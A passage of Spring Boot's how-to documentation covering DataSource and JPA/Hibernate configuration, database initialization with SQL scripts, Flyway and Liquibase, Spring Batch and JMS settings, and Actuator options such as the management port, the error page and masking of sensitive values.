follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.configuration.maximum-pool-size=30\n----\n\nTIP: Spring Boot will expose Hikari-specific settings to `spring.datasource.hikari`.\nThis example uses a more generic `configuration` sub namespace as the example does not support multiple datasource implementations.\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type` has no effect.\nIn practice, the builder is initialized with whatever value you might set there and then overridden by the call to `.type()`.\n\nSee \"`<<spring-boot-features.adoc#boot-features-configure-datasource>>`\" in the \"`Spring Boot features`\" section and the {spring-boot-autoconfigure-module-code}\/jdbc\/DataSourceAutoConfiguration.java[`DataSourceAutoConfiguration`] class for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are described in the previous section.\nYou must, however, mark one of the `DataSource` instances as `@Primary`, because various auto-configurations down the road expect to be able to get one by type.\n\nIf you create your own `DataSource`, the auto-configuration backs off.\nIn the following example, we provide the _exact_ same feature set as the auto-configuration provides on the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `firstDataSourceProperties` has to be flagged as `@Primary` so that the database initializer feature uses your copy (if you use the initializer).\n\nBoth data sources are also bound for advanced customizations.\nFor instance, you could configure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.first.url=jdbc:mysql:\/\/localhost\/first\n\tapp.datasource.first.username=dbuser\n\tapp.datasource.first.password=dbpass\n\tapp.datasource.first.configuration.maximum-pool-size=30\n\n\tapp.datasource.second.url=jdbc:mysql:\/\/localhost\/second\n\tapp.datasource.second.username=dbuser\n\tapp.datasource.second.password=dbpass\n\tapp.datasource.second.max-total=30\n----\n\nYou can apply the same concept to the secondary `DataSource` as well, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThe preceding example configures two data sources on custom namespaces with the same logic as Spring Boot would use in auto-configuration.\nNote that each `configuration` sub namespace provides advanced settings based on the chosen implementation.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data Repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors.\nSpring Boot handles all of that for you, as long as those `@Repositories` are included in the same package (or a sub-package) of your `@EnableAutoConfiguration` class.\n\nFor many applications, all you need is to put the right Spring Data dependencies on your classpath.\nThere is a `spring-boot-starter-data-jpa` for JPA, `spring-boot-starter-data-mongodb` for Mongodb, etc.\nTo get started, create some repository interfaces to handle your `@Entity` objects.\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the `@EnableAutoConfiguration` it finds.\nTo get more control, use the `@EnableJpaRepositories` annotation (from Spring Data JPA).\n\nFor more about Spring Data, see the {spring-data}[Spring Data project page].\n\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity Definitions from Spring Configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the `@EnableAutoConfiguration` it finds.\nTo get more control, you can use the `@EntityScan` annotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA Properties\nSpring Data JPA already provides some vendor-independent configuration options (such as those for SQL logging), and Spring Boot exposes those options and a few more for Hibernate as external configuration properties.\nSome of them are automatically detected according to the context so you should not have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` is a special case, because, depending on runtime conditions, it has different defaults.\nIf an embedded database is used and no schema manager (such as Liquibase or Flyway) is handling the `DataSource`, it defaults to `create-drop`.\nIn all other cases, it defaults to `none`.\n\nThe dialect to use is detected by the JPA provider.\nIf you prefer to set the dialect yourself, set the configprop:spring.jpa.database-platform[] property.\n\nThe most common options to set are shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition, all properties in `+spring.jpa.properties.*+` are passed through as normal JPA properties (with the prefix stripped) when the local `EntityManagerFactory` is created.\n\n[WARNING]\n====\nYou need to ensure that names defined under `+spring.jpa.properties.*+` exactly match those expected by your JPA provider.\nSpring Boot will not attempt any kind of relaxed binding for these entries.\n\nFor example, if you want to configure Hibernate's batch size you must use `+spring.jpa.properties.hibernate.jdbc.batch_size+`.\nIf you use other forms, such as `batchSize` or `batch-size`, Hibernate will not apply the setting.\n====\n\nTIP: If you need to apply advanced customization to Hibernate properties, consider registering a `HibernatePropertiesCustomizer` bean that will be invoked prior to creating the `EntityManagerFactory`.\nThis takes precedence to anything that is applied by the auto-configuration.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nHibernate uses {hibernate-docs}#naming[two different naming strategies] to map names from the object model to the corresponding database names.\nThe fully qualified class name of the physical and the implicit strategy implementations can be configured by setting the `spring.jpa.hibernate.naming.physical-strategy` and `spring.jpa.hibernate.naming.implicit-strategy` properties, respectively.\nAlternatively, if `ImplicitNamingStrategy` or `PhysicalNamingStrategy` beans are available in the application context, Hibernate will be automatically configured to use them.\n\nBy default, Spring Boot configures the physical naming strategy with `SpringPhysicalNamingStrategy`.\nThis implementation provides the same table structure as Hibernate 4: all dots are replaced by underscores and camel casing is replaced by underscores as well.\nBy default, all table names are generated in lower case, but it is possible to override that flag if your schema requires it.\n\nFor example, a `TelephoneNumber` entity is mapped to the `telephone_number` table.\n\nIf you prefer to use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\nAlternatively, you can configure the following bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic PhysicalNamingStrategy physicalNamingStrategy() {\n\t\treturn new PhysicalNamingStrategyStandardImpl();\n\t}\n----\n\nSee {spring-boot-autoconfigure-module-code}\/orm\/jpa\/HibernateJpaAutoConfiguration.java[`HibernateJpaAutoConfiguration`] and {spring-boot-autoconfigure-module-code}\/orm\/jpa\/JpaBaseConfiguration.java[`JpaBaseConfiguration`] for more details.\n\n\n\n[[howto-configure-hibernate-second-level-caching]]\n=== Configure Hibernate Second-Level Caching\nHibernate {hibernate-docs}#caching[second-level cache] can be configured for a range of cache providers.\nRather than configuring Hibernate to lookup the cache provider again, it is better to provide the one that is available in the context whenever possible.\n\nIf you're using JCache, this is pretty easy.\nFirst, make sure that `org.hibernate:hibernate-jcache` is available on the classpath.\nThen, add a `HibernatePropertiesCustomizer` bean as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jpa\/HibernateSecondLevelCacheExample.java[tag=configuration]\n----\n\nThis customizer will configure Hibernate to use the same `CacheManager` as the one that the application uses.\nIt is also possible to use separate `CacheManager` instances.\nFor details, refer to {hibernate-docs}#caching-provider-jcache[the Hibernate user guide].\n\n\n\n[[howto-use-dependency-injection-hibernate-components]]\n=== Use Dependency Injection in Hibernate Components\nBy default, Spring Boot registers a `BeanContainer` implementation that uses the `BeanFactory` so that converters and entity listeners can use regular dependency injection.\n\nYou can disable or tune this behaviour by registering a `HibernatePropertiesCustomizer` that removes or changes the `hibernate.resource.beans.container` property.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a Custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add a `@Bean` named '`entityManagerFactory`'.\nSpring Boot auto-configuration switches off its entity manager in the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you need to define a new one.\nOtherwise, the presence of the second bean of that type switches off the default.\nTo make it easy to do, you can use the convenient `EntityManagerBuilder` provided by Spring Boot.\nAlternatively, you can just the `LocalContainerEntityManagerFactoryBean` directly from Spring ORM, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nNOTE: When you create a bean for `LocalContainerEntityManagerFactoryBean` yourself, any customization that was applied during the creation of the auto-configured `LocalContainerEntityManagerFactoryBean` is lost.\nFor example, in case of Hibernate, any properties under the `spring.jpa.hibernate` prefix will not be automatically applied to your `LocalContainerEntityManagerFactoryBean`.\nIf you were relying on these properties for configuring things like the naming strategy or the DDL mode, you will need to explicitly configure that when creating the `LocalContainerEntityManagerFactoryBean` bean.\nOn the other hand, properties that get applied to the auto-configured `EntityManagerFactoryBuilder`, which are specified via `spring.jpa.properties`, will automatically be applied, provided you use the auto-configured `EntityManagerFactoryBuilder` to build the `LocalContainerEntityManagerFactoryBean` bean.\n\nThe configuration above almost works on its own.\nTo complete the picture, you need to configure `TransactionManagers` for the two `EntityManagers` as well.\nIf you mark one of them as `@Primary`, it could be picked up by the default `JpaTransactionManager` in Spring Boot.\nThe other would have to be explicitly injected into a new instance.\nAlternatively, you might be able to use a JTA transaction manager that spans both.\n\nIf you use Spring Data, you need to configure `@EnableJpaRepositories` accordingly, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a Traditional persistence.xml File\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default.\nIf you prefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of type `LocalEntityManagerFactoryBean` (with an ID of '`entityManagerFactory`') and set the persistence unit name there.\n\nSee {spring-boot-autoconfigure-module-code}\/orm\/jpa\/JpaBaseConfiguration.java[`JpaBaseConfiguration`] for the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo Repositories\nSpring Data JPA and Spring Data Mongo can both automatically create `Repository` implementations for you.\nIf they are both present on the classpath, you might have to do some extra configuration to tell Spring Boot which repositories to create.\nThe most explicit way to do that is to use the standard Spring Data `+@EnableJpaRepositories+` and `+@EnableMongoRepositories+` annotations and provide the location of your `Repository` interfaces.\n\nThere are also flags (`+spring.data.*.repositories.enabled+` and `+spring.data.*.repositories.type+`) that you can use to switch the auto-configured repositories on and off in external configuration.\nDoing so is useful, for instance, in case you want to switch off the Mongo repositories and still use the auto-configured `MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data repository types (Elasticsearch, Solr, and others).\nTo work with them, change the names of the annotations and flags accordingly.\n\n\n\n[[howto-use-customize-spring-datas-web-support]]\n=== Customize Spring Data's Web Support\nSpring Data provides web support that simplifies the use of Spring Data repositories in a web application.\nSpring Boot provides properties in the `spring.data.web` namespace for customizing its configuration.\nNote that if you are using Spring Data REST, you must use the properties in the `spring.data.rest` namespace instead.\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data Repositories as REST Endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you,\nprovided Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties (from the `spring.data.rest` namespace) that customize the {spring-data-rest-api}\/core\/config\/RepositoryRestConfiguration.html[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a {spring-data-rest-api}\/webmvc\/config\/RepositoryRestConfigurer.html[`RepositoryRestConfigurer`] bean.\n\nNOTE: If you do not specify any order on your custom `RepositoryRestConfigurer`, it runs after the one Spring Boot uses internally.\nIf you need to specify an order, make sure it is higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a Component that is Used by JPA\nIf you want to configure a component that JPA uses, then you need to ensure that the component is initialized before JPA.\nWhen the component is auto-configured, Spring Boot takes care of this for you.\nFor example, when Flyway is auto-configured, Hibernate is configured to depend upon Flyway so that Flyway has a chance to initialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an `EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up the necessary dependencies.\nFor example, if you use Hibernate Search with Elasticsearch as its index manager, any `EntityManagerFactory` beans must be configured to depend on the `elasticsearchClient` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own `DSLContext` for each one.\nRefer to {spring-boot-autoconfigure-module-code}\/jooq\/JooqAutoConfiguration.java[JooqAutoConfiguration] for more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be reused to provide similar features to what the auto-configuration does with a single `DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database Initialization\nAn SQL database can be initialized in different ways depending on what your stack is.\nOf course, you can also do it manually, provided the database is a separate process.\nIt is recommended to use a single mechanism for schema generation.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a Database Using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the database.\nThis is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor independent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the behavior in a more fine-grained way.\n This feature is described in more detail later in this guide.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a Database Using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property values are `none`, `validate`, `update`, `create`, and `create-drop`.\nSpring Boot chooses a default value for you based on whether it thinks your database is embedded.\nIt defaults to `create-drop` if no schema manager has been detected or `none` in all other cases.\nAn embedded database is detected by looking at the `Connection` type.\n`hsqldb`, `h2`, and `derby` are embedded, and others are not.\nBe careful when switching from in-memory to a '`real`' database that you do not make assumptions about the existence of the tables and data in the new platform.\nYou either have to set `ddl-auto` explicitly or use one of the other mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger.\nThis is done for you automatically if you enable the <<spring-boot-features.adoc#boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath is executed on startup if Hibernate creates the schema from scratch (that is, if the `ddl-auto` property is set to `create` or `create-drop`).\nThis can be useful for demos and for testing if you are careful but is probably not something you want to be on the classpath in production.\nIt is a Hibernate feature (and has nothing to do with Spring).\n\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a Database using basic SQL scripts\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and initialize it (DML scripts).\nIt loads SQL from the standard root classpath locations: `schema.sql` and `data.sql`, respectively.\nIn addition, Spring Boot processes the `schema-$\\{platform}.sql` and `data-$\\{platform}.sql` files (if present), where `platform` is the value of `spring.datasource.platform`.\nThis allows you to switch to database-specific scripts if necessary.\nFor example, you might choose to set it to the vendor name of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql`, and so on).\n\n[NOTE]\n====\nWhen only basic SQL scripts are used, Spring Boot automatically creates the schema of an embedded `DataSource`.\nThis behavior can be customized by using the configprop:spring.datasource.initialization-mode[] property.\nFor instance, if you want to always initialize the `DataSource` regardless of its type:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.datasource.initialization-mode=always\n----\n\nIn a JPA-based app, you can choose to let Hibernate create the schema or use `schema.sql`, but you cannot do both.\nMake sure to disable `spring.jpa.hibernate.ddl-auto` if you use `schema.sql`.\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.ddl-auto=none\n----\n\nIf you are using a <<spring-boot-features.adoc#howto-use-a-higher-level-database-migration-tool,Higher-level Database Migration Tool>>, like Flyway or Liquibase, you cannot use basic SQL scripts to create and initialize the schema.\nIn this situation, if `schema.sql` and `data.sql` are present, they will be ignored.\nIt is not possible to use a Database Migration Tool to manage schema creation, and a basic SQL script to initialize it.\n====\n\nBy default, Spring Boot enables the fail-fast feature of the Spring JDBC initializer.\nThis means that, if the scripts cause exceptions, the application fails to start.\nYou can tune that behavior by setting `spring.datasource.continue-on-error`.\n\n\n\n[[howto-initialize-a-database-using-r2dbc]]\n=== Initialize a Database Using R2DBC\nIf you are using R2DBC, the regular `DataSource` auto-configuration backs off so none of the options described above can be used.\n\nIf you are using Spring Data R2DBC, you can initialize the database on startup using simple SQL scripts as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/r2dbc\/R2dbcDatabaseInitializationExample.java[tag=configuration]\n----\n\nAlternatively, you can configure either <<howto-execute-flyway-database-migrations-on-startup,Flyway>> or <<howto-execute-liquibase-database-migrations-on-startup,Liquibase>> to configure a `DataSource` for you for the duration of the migration.\nBoth these libraries offer properties to set the `url`, `username` and `password` of the database to migrate.\n\nNOTE: When choosing this option, `org.springframework:spring-jdbc` is still a required dependency.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch Database\nIf you use Spring Batch, it comes pre-packaged with SQL initialization scripts for most popular database platforms.\nSpring Boot can detect your database type and execute those scripts on startup.\nIf you use an embedded database, this happens by default.\nYou can also enable it for any database type, as shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.batch.initialize-schema=always\n----\n\nYou can also switch off the initialization explicitly by setting `spring.batch.initialize-schema=never`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a Higher-level Database Migration Tool\nSpring Boot supports two higher-level migration tools: https:\/\/flywaydb.org\/[Flyway] and https:\/\/www.liquibase.org\/[Liquibase].\n\n\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway Database Migrations on Startup\nTo automatically run Flyway database migrations on startup, add the `org.flywaydb:flyway-core` to your classpath.\n\nTypically, migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an underscore-separated version, such as '`1`' or '`2_1`').\nBy default, they are in a directory called `classpath:db\/migration`, but you can modify that location by setting `spring.flyway.locations`.\nThis is a comma-separated list of one or more `classpath:` or `filesystem:` locations.\nFor example, the following configuration would search for scripts in both the default classpath location and the `\/opt\/migration` directory:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.flyway.locations=classpath:db\/migration,filesystem:\/opt\/migration\n----\n\nYou can also add a special `\\{vendor}` placeholder to use vendor-specific scripts.\nAssume the following:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.flyway.locations=classpath:db\/migration\/{vendor}\n----\n\nRather than using `db\/migration`, the preceding configuration sets the directory to use according to the type of the database (such as `db\/migration\/mysql` for MySQL).\nThe list of supported databases is available in {spring-boot-module-code}\/jdbc\/DatabaseDriver.java[`DatabaseDriver`].\n\nMigrations can also be written in Java.\nFlyway will be auto-configured with any beans that implement `JavaMigration`.\n\n{spring-boot-autoconfigure-module-code}\/flyway\/FlywayProperties.java[`FlywayProperties`] provides most of Flyway's settings and a small set of additional properties that can be used to disable the migrations or switch off the location checking.\nIf you need more control over the configuration, consider registering a `FlywayConfigurationCustomizer` bean.\n\nSpring Boot calls `Flyway.migrate()` to perform the database migration.\nIf you would like more control, provide a `@Bean` that implements {spring-boot-autoconfigure-module-code}\/flyway\/FlywayMigrationStrategy.java[`FlywayMigrationStrategy`].\n\nFlyway supports SQL and Java https:\/\/flywaydb.org\/documentation\/callbacks.html[callbacks].\nTo use SQL-based callbacks, place the callback scripts in the `classpath:db\/migration` directory.\nTo use Java-based callbacks, create one or more beans that implement `Callback`.\nAny such beans are automatically registered with `Flyway`.\nThey can be ordered by using `@Order` or by implementing `Ordered`.\nBeans that implement the deprecated `FlywayCallback` interface can also be detected, however they cannot be used alongside `Callback` beans.\n\nBy default, Flyway autowires the (`@Primary`) `DataSource` in your context and uses that for migrations.\nIf you like to use a different `DataSource`, you can create one and mark its `@Bean` as `@FlywayDataSource`.\nIf you do so and want two data sources, remember to create another one and mark it as `@Primary`.\nAlternatively, you can use Flyway's native `DataSource` by setting `spring.flyway.[url,user,password]` in external properties.\nSetting either `spring.flyway.url` or `spring.flyway.user` is sufficient to cause Flyway to use its own `DataSource`.\nIf any of the three properties has not been set, the value of its equivalent `spring.datasource` property will be used.\n\nYou can also use Flyway to provide data for specific scenarios.\nFor example, you can place test-specific migrations in `src\/test\/resources` and they are run only when your application starts for testing.\nAlso, you can use profile-specific configuration to customize `spring.flyway.locations` so that certain migrations run only when a particular profile is active.\nFor example, in `application-dev.properties`, you might specify the following setting:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.flyway.locations=classpath:\/db\/migration,classpath:\/dev\/db\/migration\n----\n\nWith that setup, migrations in `dev\/db\/migration` run only when the `dev` profile is active.\n\n\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase Database Migrations on Startup\nTo automatically run Liquibase database migrations on startup, add the `org.liquibase:liquibase-core` to your classpath.\n\n[NOTE]\n====\nWhen you add the `org.liquibase:liquibase-core` to your classpath, database migrations run by default for both during application startup and before your tests run.\nThis behavior can be customized by using the configprop:spring.liquibase.enabled[] property, setting different values in the `main` and `test` configurations.\nIt is not possible to use two different ways to initialize the database (e.g. Liquibase for application startup, JPA for test runs).\n====\n\nBy default, the master change log is read from `db\/changelog\/db.changelog-master.yaml`, but you can change the location by setting `spring.liquibase.change-log`.\nIn addition to YAML, Liquibase also supports JSON, XML, and SQL change log formats.\n\nBy default, Liquibase autowires the (`@Primary`) `DataSource` in your context and uses that for migrations.\nIf you need to use a different `DataSource`, you can create one and mark its `@Bean` as `@LiquibaseDataSource`.\nIf you do so and you want two data sources, remember to create another one and mark it as `@Primary`.\nAlternatively, you can use Liquibase's native `DataSource` by setting `spring.liquibase.[url,user,password]` in external properties.\nSetting either `spring.liquibase.url` or `spring.liquibase.user` is sufficient to cause Liquibase to use its own `DataSource`.\nIf any of the three properties has not been set, the value of its equivalent `spring.datasource` property will be used.\n\nSee {spring-boot-autoconfigure-module-code}\/liquibase\/LiquibaseProperties.java[`LiquibaseProperties`] for details about available settings such as contexts, the default schema, and others.\n\n\n\n[[howto-messaging]]\n== Messaging\nSpring Boot offers a number of starters that include messaging.\nThis section answers questions that arise from using messaging with Spring Boot.\n\n\n\n[[howto-jms-disable-transaction]]\n=== Disable Transacted JMS Session\nIf your JMS broker does not support transacted sessions, you have to disable the support of transactions altogether.\nIf you create your own `JmsListenerContainerFactory`, there is nothing to do, since, by default it cannot be transacted.\nIf you want to use the `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you can disable transacted sessions, as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThe preceding example overrides the default factory, and it should be applied to any other factory that your application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch Applications\nA number of questions often arise when people use Spring Batch from within a Spring Boot application.\nThis section addresses those questions.\n\n\n\n[[howto-spring-batch-specifying-a-data-source]]\n=== Specifying a Batch Data Source\nBy default, batch applications require a `DataSource` to store job details.\nSpring Batch expects a single `DataSource` by default.\nTo have it use a `DataSource` other than the application\u2019s main `DataSource`, declare a `DataSource` bean, annotating its `@Bean` method with `@BatchDataSource`.\nIf you do so and want two data sources, remember to mark the other one `@Primary`.\nTo take greater control, implement `BatchConfigurer`.\nSee {spring-batch-api}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The Javadoc of `@EnableBatchProcessing`] for more details.\n\nFor more info about Spring Batch, see the {spring-batch}[Spring Batch project page].\n\n\n\n[[howto-spring-batch-running-jobs-on-startup]]\n=== Running Spring Batch Jobs on Startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing` to one of your `@Configuration` classes.\n\nBy default, it executes *all* `Jobs` in the application context on startup (see {spring-boot-autoconfigure-module-code}\/batch\/JobLauncherApplicationRunner.java[`JobLauncherApplicationRunner`] for details).\nYou can narrow down to a specific job or jobs by specifying `spring.batch.job.names` (which takes a comma-separated list of job name patterns).\n\nSee {spring-boot-autoconfigure-module-code}\/batch\/BatchAutoConfiguration.java[BatchAutoConfiguration] and {spring-batch-api}\/core\/configuration\/annotation\/EnableBatchProcessing.html[@EnableBatchProcessing] for more details.\n\n\n\n[[howto-spring-batch-running-command-line]]\n=== Running from the Command Line\nSpring Boot converts any command line argument starting with `--` to a property to add to the `Environment`, see <<spring-boot-features.adoc#boot-features-external-config-command-line-args,accessing command line properties>>.\nThis should not be used to pass arguments to batch jobs.\nTo specify batch arguments on the command line, use the regular format (i.e. without `--`), as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -jar myapp.jar someParameter=someValue anotherParameter=anotherValue\n----\n\nIf you specify a property of the `Environment` on the command line, it is ignored by the job.\nConsider the following command:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -jar myapp.jar --server.port=7070 someParameter=someValue\n----\n\nThis provides only one argument to the batch job: `someParameter=someValue`.\n\n\n\n[[howto-spring-batch-storing-job-repository]]\n=== Storing the Job Repository\nSpring Batch requires a data store for the `Job` repository.\nIf you use Spring Boot, you must use an actual database.\nNote that it can be an in-memory database, see {spring-batch-docs}job.html#configuringJobRepository[Configuring a Job Repository].\n\n\n\n[[howto-actuator]]\n== Actuator\nSpring Boot includes the Spring Boot Actuator.\nThis section answers questions that often arise from its use.\n\n\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP Port or Address of the Actuator Endpoints\nIn a standalone application, the Actuator HTTP port defaults to the same as the main HTTP port.\nTo make the application listen on a different port, set the external property: configprop:management.server.port[].\nTo listen on a completely different network address (such as when you have an internal network for management and an external one for user applications), you can also set `management.server.address` to a valid IP address to which the server is able to bind.\n\nFor more detail, see the {spring-boot-actuator-autoconfigure-module-code}\/web\/server\/ManagementServerProperties.java[`ManagementServerProperties`] source code and \"`<<production-ready-features.adoc#production-ready-customizing-management-server-port>>`\" in the \"`Production-ready features`\" section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' Error Page\nSpring Boot installs a '`whitelabel`' error page that you see in a browser client if you encounter a server error (machine clients consuming JSON and other media types should see a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off.\nDoing so restores the default of the servlet container that you are using.\nNote that Spring Boot still tries to resolve the error view, so you should probably add your own error page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you use.\nFor example, if you use Thymeleaf, you can add an `error.html` template.\nIf you use FreeMarker, you can add an `error.ftlh` template.\nIn general, you need a `View` that resolves with a name of `error` or a `@Controller` that handles the `\/error` path.\nUnless you replaced some of the default configuration, you should find a `BeanNameViewResolver` in your `ApplicationContext`, so a `@Bean` named `error` would be a simple way of doing that.\nSee {spring-boot-autoconfigure-module-code}\/web\/servlet\/error\/ErrorMvcAutoConfiguration.java[`ErrorMvcAutoConfiguration`] for more options.\n\nSee also the section on \"`<<spring-boot-features.adoc#boot-features-error-handling, Error Handling>>`\" for details of how to register handlers in the servlet container.\n\n\n\n[[howto-sanitize-sensible-values]]\n[[howto-sanitize-sensitive-values]]\n=== Sanitize Sensitive Values\nInformation returned by the `env` and `configprops` endpoints can be somewhat sensitive so keys matching a certain pattern are sanitized by default (i.e. their values are replaced by `+******+`).\n\nThe patterns to use can be customized using the `management.endpoint.env.keys-to-sanitize` and `management.endpoint.configprops.keys-to-sanitize` respectively.\n\nSpring Boot uses sensible defaults for such keys: any key ending with the word \"password\", \"secret\", \"key\", \"token\", \"vcap_services\", \"sun.java.command\", \"uri\", \"uris\", \"address\" or \"addresses\" is sanitized.\nAdditionally, any key that holds the word `credentials` as part of the key is sanitized (configured as a regular expression, i.e. `+.*credentials.*+`).\n\nIf any of the keys to sanitize are URI format (i.e. `<scheme>:\/\/<username>:<password>@<host>:<port>\/`), only the password part is 